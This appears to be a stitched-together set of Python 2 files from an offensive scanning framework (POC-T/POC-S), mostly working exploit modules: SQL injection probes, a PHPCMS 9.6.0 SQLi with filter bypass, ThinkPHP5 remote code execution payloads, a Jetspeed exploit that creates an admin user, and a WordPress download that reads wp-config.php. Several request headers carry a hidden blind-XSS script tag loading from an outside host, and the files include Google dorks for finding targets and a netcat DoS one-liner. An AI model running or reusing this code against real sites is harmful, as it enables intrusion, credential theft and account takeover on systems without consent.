    errors.append( ('Sintaxis incorrecta cerca de', dbms.MSSQL ) )
    errors.append( ('Syntax error in string in query expression', dbms.MSSQL ) )
    errors.append( ('ADODB\\.Field \\(0x800A0BCD\\)<br>', dbms.MSSQL ) )
    errors.append( ("Procedure '[^']+' requires parameter '[^']+'", dbms.MSSQL ))
    errors.append( ("ADODB\\.Recordset'", dbms.MSSQL ))
    errors.append( ("Unclosed quotation mark before the character string", dbms.MSSQL ))
    
    # DB2
    errors.append( ('SQLCODE', dbms.DB2 ) )
    errors.append( ('DB2 SQL error:', dbms.DB2 ) )
    errors.append( ('SQLSTATE', dbms.DB2 ) )
    errors.append( ('\\[IBM\\]\\[CLI Driver\\]\\[DB2/6000\\]', dbms.DB2 ) )
    errors.append( ('\\[CLI Driver\\]', dbms.DB2 ) )
    errors.append( ('\\[DB2/6000\\]', dbms.DB2 ) )
    
    # Sybase
    errors.append( ("Sybase message:", dbms.SYBASE ) )
    
    # Access
    errors.append( ('Syntax error in query expression', dbms.ACCESS ))
    errors.append( ('Data type mismatch in criteria expression.', dbms.ACCESS ))
    errors.append( ('Microsoft JET Database Engine', dbms.ACCESS ))
    errors.append( ('\\[Microsoft\\]\\[ODBC Microsoft Access Driver\\]', dbms.ACCESS ) )
    
    # ORACLE
    errors.append( ('(PLS|ORA)-[0-9][0-9][0-9][0-9]', dbms.ORACLE ) )
    
    # POSTGRE
    errors.append( ('PostgreSQL query failed:', dbms.POSTGRE ) )
    errors.append( ('supplied argument is not a valid PostgreSQL result', dbms.POSTGRE ) )
    errors.append( ('pg_query\\(\\) \\[:', dbms.POSTGRE ) )
    errors.append( ('pg_exec\\(\\) \\[:', dbms.POSTGRE ) )
    
    # MYSQL
    errors.append( ('supplied argument is not a valid MySQL', dbms.MYSQL ) )
    errors.append( ('Column count doesn\'t match value count at row', dbms.MYSQL ) )
    errors.append( ('mysql_fetch_array\\(\\)', dbms.MYSQL ) )
    errors.append( ('mysql_', dbms.MYSQL ) )
    errors.append( ('on MySQL result index', dbms.MYSQL ) )
    errors.append( ('You have an error in your SQL syntax;', dbms.MYSQL ) )
    errors.append( ('You have an error in your SQL syntax near', dbms.MYSQL ) )
    errors.append( ('MySQL server version for the right syntax to use', dbms.MYSQL ) )
    errors.append( ('\\[MySQL\\]\\[ODBC', dbms.MYSQL ))
    errors.append( ("Column count doesn't match", dbms.MYSQL ))
    errors.append( ("the used select statements have different number of columns", dbms.MYSQL ))
    errors.append( ("Table '[^']+' doesn't exist", dbms.MYSQL ))

    
    # Informix
    errors.append( ('com\\.informix\\.jdbc', dbms.INFORMIX ))
    errors.append( ('Dynamic Page Generation Error:', dbms.INFORMIX ))
    errors.append( ('An illegal character has been found in the statement', dbms.INFORMIX ))
    
    errors.append( ('<b>Warning</b>:  ibase_', dbms.INTERBASE ))
    errors.append( ('Dynamic SQL Error', dbms.INTERBASE ))
    
    # DML
    errors.append( ('\\[DM_QUERY_E_SYNTAX\\]', dbms.DMLDATABASE ))
    errors.append( ('has occurred in the vicinity of:', dbms.DMLDATABASE ))
    errors.append( ('A Parser Error \\(syntax error\\)', dbms.DMLDATABASE ))
    
    # Java
    errors.append( ('java\\.sql\\.SQLException', dbms.JAVA ))
    errors.append( ('Unexpected end of command in statement', dbms.JAVA ))

    # Coldfusion
    errors.append( ('\\[Macromedia\\]\\[SQLServer JDBC Driver\\]', dbms.MSSQL ))
    
    # Generic errors..
    errors.append( ('SELECT .*? FROM .*?', dbms.UNKNOWN ))
    errors.append( ('UPDATE .*? SET .*?', dbms.UNKNOWN ))
    errors.append( ('INSERT INTO .*?', dbms.UNKNOWN ))
    errors.append( ('Unknown column', dbms.UNKNOWN ))
    errors.append( ('where clause', dbms.UNKNOWN ))
    errors.append( ('SqlServer', dbms.UNKNOWN ))

    sql_errors = []
    for re_string, dbms_type in errors:
        sql_errors.append((re.compile(re_string, re.IGNORECASE), dbms_type))
    return sql_errors

def Str_sqli(url,html):
    parse = urlparse.urlparse(url)
    if not parse.query:
        return False

    for path in parse.query.split('&'):
        if '=' not in path:
            continue
        k, v = path.split('=')
        if(v.isalnum()):
            quotes = ['\'' , '"','']
            payload_0 = [" and 0;-- ","/**/and/**/0;#","\tand\t0;#","\nand/**/0;#"]
            payload_1 = [" and 1;-- ","/**/and/**/1;#","\tand\t1;#","\nand/**/1;#"]

            for i in quotes:
                for j in range(len(payload_0)):
                    p0 = i + payload_0[j]
                    p1 = i + payload_1[j]
                    try:
                        header = dict()
                        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
                        header["Referer"] = "http://www.qq.com"
                        url_1 = url.replace("%s=%s"%(k,v),"%s=%s"%(k,v+urlencode(p0)))
                        url_2 = url.replace("%s=%s"%(k,v),"%s=%s"%(k,v+urlencode(p1)))
                        res_md5_1 = md5(html)
                        html = requests.get(url_1, headers=header).text
                        res_md5_2 = md5(html)
                        html = requests.get(url_2, headers=header).text
                        res_md5_3 = md5(html)
                    except Exception,e:
                        res_md5_1 = res_md5_2 = res_md5_3 = 0
                    if ( res_md5_1 == res_md5_3 ) and res_md5_1 != res_md5_2:
                        return "[SQL INJECT] [Str Inject Key:%s] %s"%(k,url)

def poc(url):
    header = dict()
    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
    header["Referer"] = "http://www.qq.com"
    try:
        html = requests.get(url, headers=header).text
        s1 = Error_sqli(url,html)
        if s1:
            return s1
        s2 = INT_sqli(url,html)
        if s2:
            return s2
        s3 = Str_sqli(url,html)
        if s3:
            return s3
    except:
        return False


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
Wordpress force download Arbitrary File Download

Dork
  inurl:force-download.php?file=wp-content/uploads
  inurl:wp-content/uploads
  inurl:force-download.php?file=

Usage
  python POC-T.py -s wp-forcedownload -aG "inurl:force-download.php?file="

Vendor Homepage
  http://elouai.com/force-download.php

"""

import urllib2
from plugin.urlparser import iterate_path


def poc(url):
    if '://' not in url:
        url = 'http://' + url
    payload = '/force-download.php?file=wp-config.php'
    for i in iterate_path(url):
        if '?' in i:
            continue
        target = i.rstrip('/') + payload
        try:
            r = urllib2.urlopen(target).read()  # cannot use requests here
            if 'define(' in r and 'DB_PASSWORD' in r:
                return target
        except Exception, e:
            pass
    return False



#!/usr/bin/env python            
#coding:utf-8

from setuptools import setup, find_packages
import sys, os

version = '1.2'

setup(name='pocs',
      version=version,
      description="POC-T Stong Version POC-T加强版",
      long_description="""\
rivir""",
      classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
      keywords='PoC,Exp,POC-T, POC-S, Pentest',
      author='rivir',
      author_email='rivirsir@163.com',
      url='https://github.com/jiangsir404/POC-S',
      license='',
      packages=find_packages(include=('*')),
      include_package_data=True,
      zip_safe=False,
      install_requires=[
          # -*- Extra requirements: -*-
          'requests',
          'gevent',
          'shodan',
          'google-api-python-client'
      ],
      entry_points={
          "console_scripts": [
              "poc-s=pocs.pocs:main",
              "pocs=pocs.pocs:main"
          ]
      },
      )



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = w8ay
import requests
import re
import urlparse

dna = '''WAF:Topsec-Waf|index|index|<META NAME="Copyright" CONTENT="Topsec Network Security Technology Co.,Ltd"/>|<META NAME="DESCRIPTION" CONTENT="Topsec web UI"/>
WAF:360|headers|X-Powered-By-360wzb|wangzhan\.360\.cn
WAF:360|url|/wzws-waf-cgi/|360wzws
WAF:Anquanbao|headers|X-Powered-By-Anquanbao|MISS
WAF:Anquanbao|url|/aqb_cc/error/|ASERVER
WAF:BaiduYunjiasu|headers|Server|yunjiasu-nginx
WAF:BigIP|headers|Server|BigIP|BIGipServer
WAF:BigIP|headers|Set-Cookie|BigIP|BIGipServer
WAF:BinarySEC|headers|x-binarysec-cache|fill|miss
WAF:BinarySEC|headers|x-binarysec-via|binarysec\.com
WAF:BlockDoS|headers|Server|BlockDos\.net
WAF:CloudFlare|headers|Server|cloudflare-nginx
WAF:Cloudfront|headers|Server|cloudfront
WAF:Cloudfront|headers|X-Cache|cloudfront
WAF:Comodo|headers|Server|Protected by COMODO
WAF:IBM-DataPower|headers|X-Backside-Transport|\A(OK|FAIL)
WAF:DenyAll|headers|Set-Cookie|\Asessioncookie=
WAF:dotDefender|headers|X-dotDefender-denied|1
WAF:Incapsula|headers|X-CDN|Incapsula
WAF:Jiasule|headers|Set-Cookie|jsluid=
WAF:KSYUN|headers|Server|KSYUN ELB
WAF:KONA|headers|Server|AkamaiGHost
WAF:ModSecurity|headers|Server|Mod_Security|NOYB
WAF:NetContinuum|headers|Cneonction|\Aclose
WAF:NetContinuum|headers|nnCoection|\Aclose
WAF:NetContinuum|headers|Set-Cookie|citrix_ns_id
WAF:Newdefend|headers|Server|newdefend
WAF:NSFOCUS|headers|Server|NSFocus
WAF:Safe3|headers|X-Powered-By|Safe3WAF
WAF:Safe3|headers|Server|Safe3 Web Firewall
WAF:Safedog|headers|X-Powered-By|WAF/2\.0
WAF:Safedog|headers|Server|Safedog
WAF:Safedog|headers|Set-Cookie|Safedog
WAF:SonicWALL|headers|Server|SonicWALL
WAF:Stingray|headers|Set-Cookie|\AX-Mapping-
WAF:Sucuri|headers|Server|Sucuri/Cloudproxy
WAF:Usp-Sec|headers|Server|Secure Entry Server
WAF:Varnish|headers|X-Varnish|.*?
WAF:Varnish|headers|Server|varnish
WAF:Wallarm|headers|Server|nginx-wallarm
WAF:WebKnight|headers|Server|WebKnight
WAF:Yundun|headers|Server|YUNDUN
WAF:Yundun|headers|X-Cache|YUNDUN
WAF:Yunsuo|headers|Set-Cookie|yunsuo
'''

def identify(header,html):
    mark_list = []
    marks = dna.strip().splitlines()
    for mark in marks:
        name, location, key, value = mark.strip().split("|", 3)
        mark_list.append([name, location, key, value])

    for mark_info in mark_list:
        name, location, key, reg = mark_info
        if location == "headers":
            if key in header and re.search(reg, header[key], re.I):
                # print(name)
                return False
        if location == "index":
            if re.search(reg, html, re.I):
                # print(name)
                return False
    
    return True

def poc(url):
    if '://' not in url:
        url = 'http://' + url
    if not url.endswith('/'):
        url = url + "/"
    
    try:
        header = dict()
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
        header["Referer"] = "http://www.qq.com"
        r = requests.get(url, headers=header, timeout=5)
        if r.status_code == 200:
            f = identify(r.headers,r.text)
            if f:
                return url
            else:
                return False
        else:
            return False
    except Exception:
        return False

# print poc("http://virtual.glxy.sdu.edu.cn/")


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

import sys
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError as ServerHttpDenied
from lib.core.common import getSafeExString
from lib.core.enums import PROXY_TYPE
from lib.utils.config import ConfigFileParser
from lib.core.data import logger, conf
from thirdparty.httplib2 import Http, ProxyInfo
from socket import error as SocketError


def _initHttpClient():
    if conf.GOOGLE_PROXY:
        proxy_str = conf.GOOGLE_PROXY
    elif ConfigFileParser().GoogleProxy():
        proxy_str = ConfigFileParser().GoogleProxy()
    else:
        proxy_str = None

    if not proxy_str:
        return Http()

    msg = 'Proxy: %s' % proxy_str
    logger.info(msg)
    proxy = proxy_str.strip().split(' ')
    if len(proxy) != 3:
        msg = 'SyntaxError in GoogleProxy string, Please check your args or config file.'
        sys.exit(logger.error(msg))
    if proxy[0].lower() == 'http':
        type = PROXY_TYPE.HTTP
    elif proxy[0].lower() == 'sock5':
        type = PROXY_TYPE.SOCKS5
    elif proxy[0].lower() == 'sock4':
        type = PROXY_TYPE.SOCKS4
    else:
        msg = 'Invalid proxy-type in GoogleProxy string, Please check your args or config file.'
        sys.exit(logger.error(msg))
    try:
        port = int(proxy[2])
    except ValueError:
        msg = 'Invalid port in GoogleProxy string, Please check your args or config file.'
        sys.exit(logger.error(msg))
    else:
        http_client = Http(proxy_info=ProxyInfo(type, proxy[1], port))
    return http_client


def GoogleSearch(query, limit, offset=0):
    key = ConfigFileParser().GoogleDeveloperKey()
    engine = ConfigFileParser().GoogleEngine()
    if not key or not engine:
        msg = "Please config your 'developer_key' and 'search_enging' at toolkit.conf"
        sys.exit(logger.error(msg))
    try:
        service = build("customsearch", "v1", http=_initHttpClient(), developerKey=key)

        result_info = service.cse().list(q=query, cx=engine).execute()
        msg = 'Max query results: %s' % str(result_info.get('searchInformation',{}).get('totalResults'))
        logger.info(msg)

        ans = set()
        limit += offset
        for i in range(int(offset / 10), int((limit + 10 - 1) / 10)):
            result = service.cse().list(q=query, cx=engine, num=10, start=i * 10 + 1).execute()
            if 'items' in result:
                for url in result.get('items'):
                    ans.add(url.get('link'))
        return ans
    except SocketError:
        sys.exit(logger.error('Unable to connect Google, maybe agent/proxy error.'))
    except ServerHttpDenied, e:
        logger.warning('It seems like Google-Server denied this request.')
        sys.exit(logger.error(getSafeExString(e)))



#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞

Version
	ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/').rstrip('/index.php')
    payloads = [r"/index.php?s=index/\think\view\driver\Php/display&content=<?php%20phpinfo();?>",r"/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'"]
    for payload in payloads:
        vulnurl = url + payload
        try:
            res = requests.get(vulnurl)
            if "allow_url_fopen" in res.text:
                return True
        except:
            return False
    return False


if __name__ == "__main__":
    print poc("http://192.168.218.145:8080/")


#!/usr/bin/env python		
#coding:utf-8

import imp
import unittest
import sys
import subprocess
import os
os.chdir('../')

def load_module():
	file, path_name, description = imp.find_module('phpstudy_backdoor', ['../script/'])
	print file, path_name, description
	# 第一个参数为完整的package名称，可以随意指定
	obj = imp.load_module('xxx', file,path_name, description)
	print obj
	# print obj.poc()

class TestSearchApi(unittest.TestCase):
	"""测试加载插件的一些方式"""
	def setUp(self):
		pass

	def tearDown(self):
		pass

	def test_cmd1(self):
		cmd = "python pocs.py -s test/test2.py -iS 127.0.0.1"
		res = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True)
		self.assertTrue(res == 0)

	def test_cmd2(self):
		cmd = "python pocs.py -s ./script/test/test2.py -iS 127.0.0.1"
		res = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True)
		self.assertTrue(res == 0)

	def test_cmd3(self):
		cmd = "python pocs.py -s test2 -iS 127.0.0.1"
		res = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True)
		self.assertTrue(res == 0)

	def test_cmd4(self):
		cmd = "python pocs.py -b test -iS 127.0.0.1"
		res = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True)
		self.assertTrue(res == 0)

	def test_cmd5(self):
		cmd = "python pocs.py -b test -s test2.py -iS 127.0.0.1"
		res = subprocess.call(cmd, stdout=subprocess.PIPE, shell=True)
		self.assertTrue(res == 0)

def test():
	unittest.main()
	# suite = unittest.TestSuite()
	# suite.addTest(TestSearchApi("test_cmd1"))
	# unittest.TextTestRunner().run(suite)  	

if __name__ == '__main__':
	test()


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
Apache Jetspeed 用户管理 REST API 未授权访问添加用户 (CVE-2016-0710)

version <= 2.3.0
"""

import requests
from plugin.urlparser import get_domain
from plugin.util import randomString
from plugin.useragent import firefox

ENABLE_EXP = False


def poc(url):
    if '://' not in url:
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')

    user = randomString(6)
    password = randomString(6)

    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': 'test@test.net',
        'newrule': ''
    }
    try:
        requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
        c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        else:
            return False
    except Exception, e:
        if not ENABLE_EXP:
            return False

    url2 = url + '/jetspeed/services/usermanager/users/' + user + '/?_type=json'
    data2 = {
        'name': '',
        'password': '',
        'password_confirm': '',
        'user_name_given': '',
        'user_name_family': '',
        'user_email': '',
        'user_enabled': '',
        'roles': 'admin',
        'rule': ''
    }
    try:
        r = requests.post(url2, data=data2, headers={'User-Agent': firefox}, timeout=10, verify=False)
        if len(r.content) < 10 and 'true' in r.content:
            return '%s |user:%s |pass:%s' % (url, user, password)
    except Exception:
        return False
    return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
resin-doc 任意文件读取漏洞

/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=C:\Windows\system.ini

"""

import requests
from plugin.cloudeye import CloudEye
from plugin.urlparser import iterate_path


def poc(url):
    url = url if '://' in url else 'http://' + url
    print iterate_path(url)
    for each in iterate_path(url):
        try:
            c = CloudEye()
            domain = c.getRandomDomain('resin')
            payload = '/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://%s' % domain
            target = each.rstrip('/') + payload
            requests.get(target, timeout=5)
            if c.verifyDNS(delay=3):
                return each
        except Exception:
            pass
    return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
Memcached未授权访问

Usage
  python POC-T.py -s memcached-unauth -aS "port:11211"

Results like:
  197.xxx.0.xxx:11211 | version:1.4.13 | total_items:161028
  197.xxx.75.xxx:11211 | version:1.4.4 | total_items:51005

Possible Vulns:
 version < 1.4.17 => SASL验证绕过
 version < 1.4.3  => 远程DoS CVE-2010-1152  exp: cat /dev/zero | nc -q1 127.0.0.1 11211
 version < 1.1.12/1.2.2  => 远程溢出 CVE-2009-2415
 versoin < 1.2.8  => stats maps信息泄露 CVE-2009-1255

"""

import socket
import re
from plugin.util import host2IP


def poc(url):
    url = host2IP(url)
    port = int(url.split(':')[-1]) if ':' in url else 11211
    payload = '\x73\x74\x61\x74\x73\x0a'  # command:stats
    s = socket.socket()
    socket.setdefaulttimeout(10)
    try:
        host = url.split(':')[0]
        s.connect((host, port))
        s.send(payload)
        recvdata = s.recv(2048)  # response larger than 1024
        s.close()
        if recvdata and 'STAT version' in recvdata:
            ans_str = url
            ans_str += ' | version:' + ''.join(re.findall(r'version\s(.*?)\s', recvdata))
            ans_str += ' | total_items:' + ''.join(re.findall(r'total_items\s(\d+)\s', recvdata))
            return ans_str
    except Exception, e:
        pass
    return False



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
POC-T functional testing script
"""

auto = """

# help
-h;powered by cdxy <mail:i@cdxy.me>
--help;powered by cdxy <mail:i@cdxy.me>

# version
-v;2.
--version;2.

# show
--show;Script Name

# --browser --single -iA -iN -iS -iF
-s test;[-] Please load targets
-s test -iA 1-10 --single;[*] [single-mode] found!
-s test -iN 10.10.0/30 --browser -oF;[-] [--browser] is based on file output
-s test -iS "http://test.com" --browser;[*] System exit.
-s test -iF data/pass100.txt -t 50 -oF;concurrent: 50;[*] System exit.

# -s
-iA 1-10;Use -s to load script
-s 1234567890 -iS aaa;Script [1234567890.py] not exist
-s test -iS aaa;[*] System exit.
-s test.py -iS aaa;[*] System exit.
-s script/test.py -iS aaa;[*] System exit.
-s ./ -iS aaa;[-] [./] not a file.

# -eT -eC -t
-eT -s test -iA 1-10 -t 5 -oF;concurrent: 5;[*] System exit.
-eT -s test -iF data/pass100.txt -t 50 -oF;concurrent: 50;[*] System exit.
-eT -s test -iA 1-10 -t 500 -oF;range: 1 to 100
-eG -s test -iS http://sss.com -oF;[*] System exit

# -oS
-s test -iS aaa;by cdxy mail:i@cdxy.me };[*] System exit.
-s test -iS aaa -oS;[*] System exit.$mail:i@cdxy.me }

# --limit -aS -aZ -aG
-s test -aS 1 --limit=0;[-] Invalid value in [--limit]
-s test -aS 1 --limit=2;[+] Total: 2;[*] System exit.
-s test -aZ 1 --limit=2;[+] Total: 10;[*] System exit.
-s test -aZ 1 --limit=10;[+] Total: 10;[*] System exit.
-s test -aZ 1 --limit=11;[+] Total: 20;[*] System exit.
-s test -aG 1 --limit=2;[+] Total: 10;[*] System exit.
-s test -aG 1 --limit=10;[+] Total: 10;[*] System exit.
-s test -aG 1 --limit=11;[+] Total: 20;[*] System exit.
-s test -aG faefafw32qtfafw3;[+] Total: 0;[*] System exit.

# --offset
-s test -aS 1 --offset=0;[*] System exit.
-s test -aS 1 --offset=10;[*] System exit.

# --search-type
-s test -aZ 1 --search-type "hello";[-] Invalid value in [--search-type]
-s test -aZ 1 --search-type 111;[-] Invalid value in [--search-type]
-s test -aZ 1 --search-type web;[*] System exit.
-s test -aZ 1 --search-type host;[*] System exit.
-s test -aZ 1 --search-type web,host;[-] Invalid value in [--search-type]

# --gproxy
-s test -aG 1 --gproxy="http 127.0.0.1 1111";[-] Unable to connect Google
-s test -aG 1 --gproxy="http 127.0.0.1";[-] SyntaxError in GoogleProxy string
-s test -aG 1 --gproxy="1 127.0.0.1 1";[-] Invalid proxy-type
-s test -aG 1 --gproxy="http 127.0.0.1 fa";[-] Invalid port in GoogleProxy string
-s test -aG 1 --gproxy="http 127.0.0.1 1894";[*] System exit.
-s test -aG 1 --gproxy="sock5 127.0.0.1 7070";[*] System exit.
-s test -aG 1 --gproxy "http 127.0.0.1 23124";[-] Unable to connect Google

# output
-s test -iA 1-10 -o _checko.txt;[*] System exit.
-s test -iA 1-10 -o _checko1.txt -oF;[-] Cannot use [-oF] and [-o] together
-s test -iA 1-10 -o _checko2.txt -oS;[*] System exit.


# scripts

"""

header = """#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author"""

import os
import subprocess


def headerCheck(path):
    parents = os.listdir(path)
    for parent in parents:
        if parent == 'thirdparty':
            continue
        child = os.path.join(path, parent)
        if os.path.isdir(child):
            headerCheck(child)
        elif os.path.isfile(child):
            if child.endswith('.py'):
                if open(child).read().startswith(header):
                    pass
                else:
                    print 'Invalid header in %s' % child


def autoCheckResult(output, error, expect, unexpect):
    for each in expect:
        if each in output or each in error:
            pass
        else:
            return False
    for each in unexpect:
        if each in output or each in error:
            return False
        else:
            pass
    return True


def autoCheck():
    base = 'python POC-T.py '
    for each in auto.split('\n'):
        if not each or each.startswith('#'):
            continue
        u = each.split('$')[1:]
        each = each.split('$')[0]
        c = each.split(';')[0]
        r = each.split(';')[1:]

        command = base + c
        process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True)
        o = process.stdout.read()
        e = process.stderr.read()
        if autoCheckResult(o, e, r, u):
            pass
        else:
            print command


def checkInvalidVersion():
    command = 'python3 POC-T.py -h'
    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    o = process.stdout.read()
    e = process.stderr.read()
    if autoCheckResult(o, e, ['[CRITICAL] incompatible Python version'], []):
        pass
    else:
        print command


def checkOutput(base_path):
    target1 = os.path.join(base_path, '_checko.txt')
    target2 = os.path.join(base_path, '_checko1.txt')
    target3 = os.path.join(base_path, '_checko2.txt')
    try:
        if len(open(target1).read()) and not os.path.isfile(target2) and len(open(target3).read()):
            os.remove(target1)
            os.remove(target3)
        else:
            print '!!!failed!!!'
    except IOError:
        print '!!!failed!!!'


def debugMain():
    try:
        root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        os.chdir(root_dir)
        print '>>> base-dir [%s]' % root_dir

        print '>>> start header check'
        headerCheck(root_dir)

        print '>>> start invalid-version check'
        checkInvalidVersion()

        print '>>> start command check'
        autoCheck()

        print '>>> start output check'
        checkOutput(root_dir)

    except KeyboardInterrupt:
        exit('User quit!')
    return


if __name__ == '__main__':
    debugMain()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me

"""
PHPCMS content/down.php SQL Injection

version
  <= 9.6.0
Type
  error-based
Usage
  python POC-T.py -s phpcms9.6.0-sqli -aG "Powered by PHPCMS v9" --limit 100

"""

import requests
import re
from urllib import quote

TIMEOUT = 3


def poc(url):
    try:
        return __poc(url)
    except Exception:
        return False


def __poc(url):
    url = url if '://' in url else 'http://' + url
    url = url.split('#')[0].split('?')[0].rstrip('/').rstrip('/index.php')

    # use "*" to bypass filter "safe_replace()" in PHPCMS
    payload = "&id=%*27 and updat*exml(1,con*cat(1,(us*er())),1)%23&modelid=1&catid=1&m=1&f="

    cookies = {}
    step1 = '{}/index.php?m=wap&a=index&siteid=1'.format(url)
    for c in requests.get(step1, timeout=TIMEOUT).cookies:
        if c.name[-7:] == '_siteid':
            cookie_head = c.name[:6]
            cookies[cookie_head + '_userid'] = c.value
            cookies[c.name] = c.value
            break
    else:
        return False

    step2 = "{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}".format(url, quote(payload))
    for c in requests.get(step2, cookies=cookies, timeout=TIMEOUT).cookies:
        if c.name[-9:] == '_att_json':
            enc_payload = c.value
            break
    else:
        return False

    setp3 = url + '/index.php?m=content&c=down&a_k=' + enc_payload
    r = requests.get(setp3, cookies=cookies, timeout=TIMEOUT)
    result = re.findall('XPATH syntax error: \'(.*?)\'', r.content)
    if result[0]:
        return "{} - {}".format(url, result[0])
